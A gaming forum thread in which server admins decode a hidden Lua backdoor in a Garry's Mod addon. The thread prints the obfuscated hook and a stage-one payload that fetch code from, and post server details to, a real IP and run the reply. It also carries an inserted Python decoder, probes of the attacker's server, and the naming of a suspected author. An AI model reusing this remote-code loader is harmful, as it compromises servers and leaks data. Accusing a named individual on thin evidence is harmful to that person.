So I'm doing a job for someone and one of their addons on the server has this hook:
[code]
hook.Add("\84\104\105\110\107","\67\67\67", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if !data then return end data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c) end)) end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=')),function(body,len,headers,code) RunString(body) end)")
hook.Remove("\84\104\105\110\107","\67\67\67") end)[/code]
Can anyone help me find out what this is? It looks suspicious as shit
Could it be that it's inside sh_blockbelier.lua?
I've seen the name util.ABCDEFGEEZGEEGZGE once, and then it was a payload from a French PrisonRP server.
First it loaded a second resolve function for stage 2, collected player count, IP and hostname, and then it just resolved to an empty print. Just comment it out, and if the addon still works, up you go.
I'll take a crack at it.
So far I've got:
[lua]
-- The decoded source, stored as a string so it can be RunString'd exactly like the original
local code = [[
function util.ABCDEFGEEZGEEGZGE( data )
    local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    if !data then return end
    -- drop anything outside the base64 alphabet
    data = string.gsub( data, '[^'..b..'=]', '' )
    -- char -> 6-bit string, then every 8 bits -> one byte (a hand-rolled base64 decoder)
    return ( data:gsub( '.', function( x )
        if ( x == '=' ) then return '' end
        local r, f = '', ( b:find( x ) - 1 )
        for i = 6, 1, -1 do
            r = r..( f%2^i - f%2^( i-1 ) > 0 && '1' || '0' )
        end
        return r;
    end ):gsub( '%d%d%d?%d?%d?%d?%d?%d?', function( x )
        if ( #x ~= 8 ) then return '' end
        local c = 0
        for i = 1, 8 do
            c = c + ( x:sub( i, i ) == '1' && 2^( 8-i ) || 0 )
        end
        return string.char( c )
    end ) )
end
-- the decoded string is stored backwards, hence string.reverse
http.Fetch( string.reverse( util.ABCDEFGEEZGEEGZGE( 'cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=' ) ), function( body, len, headers, code )
    RunString( body )
end )
]]
-- "\84\104\105\110\107" is "Think", "\67\67\67" is "CCC": run once on the next tick, then remove the hook
hook.Add("Think", "CCC", function()
    RunString(code)
    hook.Remove("Think", "CCC")
end)
[/lua]
All it's doing is hiding the URL, really. Here, I'll grab the URL by running the function now:
[editline]a[/editline]
[url]http://137.74.231.80/dracaufeu/core/stage1.php[/url]
[QUOTE=Tomelyr;50840914]Could it be that it's inside sh_blockbelier.lua?
I've seen the name util.ABCDEFGEEZGEEGZGE once, and then it was a payload from a French PrisonRP server.
First it loaded a second resolve function for stage 2, collected player count, IP and hostname, and then it just resolved to an empty print. Just comment it out, and if the addon still works, up you go.[/QUOTE]
Yeah it still works without the hook but this is more a curiosity thing.
I remember way back there used to be code similar to this in some workshop addon that collected data to find out who's using the addon
eventually does this
[CODE]
http.Fetch( "http://137.74.231.80/dracaufeu/core/stage1.php", function( body, len, headers, code )
RunString( body )
end )
[/CODE]
Appreciate it guys
[editline]6th August 2016[/editline]
[QUOTE=timz9;50840934]eventually does this
[CODE]
http.Fetch( "http://137.74.231.80/dracaufeu/core/stage1.php", function( body, len, headers, code )
RunString( body )
end )
[/CODE][/QUOTE]
So it is running code through the http, huh
Multistaged as well
[editline]6th August 2016[/editline]
[code]
// Stage One
timer.Create( "LaunchGet", 23, 0, function()
    local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() }
    http.Post( "http://137.74.231.80/dracaufeu/core/stage2.php", a, function( body, len, headers, code )
        RunString(body)
    end)
end)
[/code]
He didn't add a second stage, guess that would have been eventually
Is it possible that it only serves the second stage if the parameters are valid?
After reading the stages, I believe it's meant to be a thing where he makes specific hacks for a given IP address
[editline]6th August 2016[/editline]
e.g., give community 1 this hack, community 2 this one, etc.
When served valid parameters (specifically a = { n = "Eat my ass.", nb = "999", i = "127.0.0.1" }), server responds with "PrintMessage(10,'')".
Out of curiosity how do you guys decode these sorts of things? At best google shows me it's a bytecode but I'm not actually sure what to do with that
[QUOTE=solid_jake;50840998]Out of curiosity how do you guys decode these sorts of things? At best google shows me it's a bytecode but I'm not actually sure what to do with that[/QUOTE]
Started by figuring out the hook names; you can just print the string to get the unescaped values. Then I formatted the code block, and realized I didn't need to understand it to get the URL; I just fed the function into Lua and instead of http.Fetch I print()'d it
[editline]6th August 2016[/editline]
[QUOTE=timz9;50840996]Interedasting [url=http://137.74.231.80/dracaufeu/core/]http://137.74.231.80/dracaufeu/core/[/url]
[url]http://137.74.231.80/dracaufeu/core/ajax/error_log[/url][/QUOTE]
This is god tier. I'm guessing he posts to those files to create and remove payloads. I bet he doesn't auth either.
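The decoding described in the posts above (unescape the hook names, then run the decoder with the URL printed instead of fetched), as an added example that is not part of the thread: a Python script that replicates the reversed-base64 decoder with the standard library and flags the http-callback-into-RunString pattern shared by the hook and the stage-one timer. The two samples are copied from the thread with the decoder body elided; the helper names are my own.

```python
import base64
import re

# Samples copied from the thread: the obfuscated hook (decoder body elided) and the stage-one timer.
HOOK_SAMPLE = r'''hook.Add("\84\104\105\110\107","\67\67\67", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) ... end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=')),function(body,len,headers,code) RunString(body) end)")
hook.Remove("\84\104\105\110\107","\67\67\67") end)'''
STAGE1_SAMPLE = 'timer.Create( "LaunchGet", 23, 0, function() local a = { n = GetHostName() } http.Post( "http://137.74.231.80/dracaufeu/core/stage2.php", a, function( body, len, headers, code ) RunString(body) end) end)'

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def decode_lua_escapes(s: str) -> str:
    """Turn Lua decimal escapes such as \\84\\104 into the characters they encode."""
    return re.sub(r"\\(\d{1,3})", lambda m: chr(int(m.group(1))), s)


def decode_reversed_b64(blob: str) -> str:
    """Replicate util.ABCDEFGEEZGEEGZGE followed by string.reverse. The hand-rolled
    decoder ignores '=' entirely (the blob carries a single '='), so strip any
    padding and re-pad properly before handing it to the standard library."""
    clean = "".join(c for c in blob if c in B64_ALPHABET)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("latin-1")[::-1]


def extract_indicators(lua_src: str) -> dict:
    """Pull the hook name/id and hidden URLs out of a snippet, and flag the
    http-callback-into-RunString pattern that both stages share."""
    hook = re.search(r'hook\.Add\("([^"]*)",\s*"([^"]*)"', lua_src)
    blobs = re.findall(r"util\.ABCDEFGEEZGEEGZGE\('([A-Za-z0-9+/=]+)'\)", lua_src)
    plain_urls = re.findall(r'https?://[^"\']+', lua_src)
    return {
        "hook_name": decode_lua_escapes(hook.group(1)) if hook else None,
        "hook_id": decode_lua_escapes(hook.group(2)) if hook else None,
        "urls": [decode_reversed_b64(b) for b in blobs] + plain_urls,
        "remote_code_exec": bool(re.search(r"http\.(Fetch|Post)\(", lua_src)
                                 and re.search(r"RunString\(\s*body\s*\)", lua_src)),
    }


if __name__ == "__main__":
    for sample in (HOOK_SAMPLE, STAGE1_SAMPLE):
        print(extract_indicators(sample))
```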
Seems to use a database to store payloads?
What do you want to bet it's secured correctly?
This isn't from a ScriptFodder addon is it?
Seems dodgy as shit and I have seen other DRM type code very similar to this one (Bus System - ElGringo) get removed because of it.
LMAO he doesn't auth
[QUOTE=zerf;50841018]LMAO he doesn't auth[/QUOTE]
[t]http://i.imgur.com/HbZrLMC.png[/t]
god-tier copy+paste detected
[IMG]http://i.imgur.com/bxHpsgF.png[/IMG]
>Redirect to BaguetteRP
looks like we cracked the mystery; a frenchie has compromised some servers
[QUOTE=The Commander;50841017]This isn't from a ScriptFodder addon is it?
Seems dodgy as shit and I have seen other DRM type code very similar to this one (Bus System - ElGringo) get removed because of it.[/QUOTE]
It's not from an SF addon no, it's from a privately made addon that someone had "full permission to post publically"
Main server file had this in it, had a feeling it was no good, and look at that.
:snip:
[editline]aww[/editline]
Update: server is closed :(
Which one of you told him? Or does he monitor his server 24/7...
hey if whoever made this is reading this thread, you are terrible and years late l m a o
[QUOTE=zerf;50841034]:snip:
[editline]aww[/editline]
Update: server is closed :(
Which one of you told him? Or does he monitor his server 24/7...[/QUOTE]
Maybe he just noticed the mass amounts of queries
Fun time over. Well [B]now[/B] what are we going to do?
[QUOTE=MadParakeet;50841121]Fun time over. Well [B]now[/B] what are we going to do?[/QUOTE]
Let's masturbate
This might be considered witch hunting, and I'm not saying this is his doing in the slightest, just throwing the possibility out for future reference - this French dude who was viewing this thread both before and after the shit was removed claims "I learn Lua, C++, and PHP/HTML." He hasn't posted since September 1, 2015, but is somehow now logged in and viewing the thread. [B]Maybe it's not him,[/B] but it very well could be (in the end, all we have is the shitty code and the people viewing the thread; that's not really proof of anything), if it is the case that someone alerted him to this thread.
[URL="http://steamcommunity.com/id/wareb/"]http://steamcommunity.com/id/wareb/[/URL]
[URL="https://facepunch.com/member.php?u=657037"]https://facepunch.com/member.php?u=657037[/URL]
In case his profile goes private -
[t]http://i.imgur.com/bsh4Oe4.png[/t]
He also does appear to have owned a BaguetteRP server in the past, for what it's worth
[QUOTE=timz9;50841135]Let's masturbate
This might be considered witch hunting, and I'm not saying this is his doing in the slightest, just throwing the possibility out for future reference - this French dude who was viewing this thread both before and after the shit was removed claims "I learn Lua, C++, and PHP/HTML." He hasn't posted since September 1, 2015, but is somehow now logged in and viewing the thread. [B]Maybe it's not him,[/B] but it very well could be (in the end, all we have is the shitty code and the people viewing the thread; that's not really proof of anything), if it is the case that someone alerted him to this thread.
[URL="http://steamcommunity.com/id/wareb/"]http://steamcommunity.com/id/wareb/[/URL]
[URL="https://facepunch.com/member.php?u=657037"]https://facepunch.com/member.php?u=657037[/URL]
In case his profile goes private -
[t]http://i.imgur.com/bsh4Oe4.png[/t]
He also does appear to have owned a BaguetteRP server in the past, for what it's worth[/QUOTE]
Hi
We have the same problem here: [URL="https://www.mtxserv.fr/forums/threads/keycard-system-scp.8330/page-2"]https://www.mtxserv.fr/forums/threads/keycard-system-scp.8330/page-2[/URL]
This guy [url]http://steamcommunity.com/id/Phacocher02[/url] has added an addon,
and I see this guy @Phacocher02 on the friend list of @Wareb,
and I see the same @Wareb post [URL="https://www.mtxserv.fr/forums/threads/keycard-system-scp.8330/page-4"]here[/URL].
sorry for my bad GR